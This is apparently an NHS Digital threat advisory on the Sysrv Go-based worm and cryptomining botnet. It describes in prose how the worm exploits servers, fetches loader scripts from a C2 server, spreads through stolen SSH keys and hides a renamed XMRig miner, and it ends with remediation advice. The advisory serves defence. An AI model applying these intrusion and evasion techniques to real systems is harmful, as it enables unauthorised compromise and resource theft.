Sysrv Botnet

Sysrv is a Go-based worm and botnet which targets exposed Windows and Linux-based servers. Devices enrolled into Sysrv’s botnet are then used to mine the Monero cryptocurrency.

Threat ID:: CC-3838
Category:: Botnet, Cryptocurrency, Worm
Threat Severity:: Low
Threat Vector:: Exploit, Insecure network
Published:: 6 May 2021 10:48 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

Sysrv is a Go-based worm and botnet which targets exposed Windows and Linux-based servers. Devices enrolled into Sysrv’s botnet are then used to mine the Monero cryptocurrency.

Affected platforms

The following platforms are known to be affected:

Versions: all supported

Microsoft Windows

Versions: most popular distributions

Linux

Threat details

Introduction

First observed in December 2020, Sysrv (also known as Sysrv-hello) is a worm and botnet written in the Go language. It scans the internet for exposed Windows and Linux servers, and attempts to exploit multiple vulnerabilities to gain access. Devices enrolled into Sysrv’s botnet are then used to mine the Monero cryptocurrency, whilst information is collected to facilitate lateral movement.

Delivery & activities

Sysrv's worm component scans the internet to identify vulnerable systems to enrol into its botnet, using exploits which target remote code execution (RCE) or injection vulnerabilities in a wide variety of web technologies. There is evidence indicating that the set of exploits used for this are regularly being updated through its C2 infrastructure. If successful, a loader script, ldr.sh for Linux systems or ldr.ps1 for Windows systems, is downloaded from a command and control server (C2) via wget, curl or PowerShell. The script will prepare the target system for the deployment of Sysrv by attempting to remove any existing cryptocurrency miners, terminating services, and modifying the system firewall (T1562.004).

The loader script also performs lateral movement by using brute force attacks with SSH private keys (T1021.004), which have been collected from infected servers. The loader script is downloaded on any new exploited host and the delivery process begins again. It should be noted that not all variants of the loader script will perform this lateral movement function.

Sysrv is downloaded from the C2 server by the loader script. Sysrv consists of both the worm and the miner components in a single 64-bit binary. Sysrv maintains persistence by creating a scheduled task for Sysrv executions. It executes XMRig, a cryptocurrency miner that mines Monero, which is renamed to kthreaddi. The XMRig binary and its configuration file are removed after execution (T1070.004), and the loader script also removes it from the process list to evade detection on the host.

Remediation advice

To prevent and detect an infection, NHS Digital advises that:

Secure configurations are applied to all devices.
Security updates are applied at the earliest opportunity.
Tamper protection settings in security products are enabled where available.
Obsolete platforms are segregated from the rest of the network.
IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
Administrative accounts are only used for necessary purposes.
Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that the NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.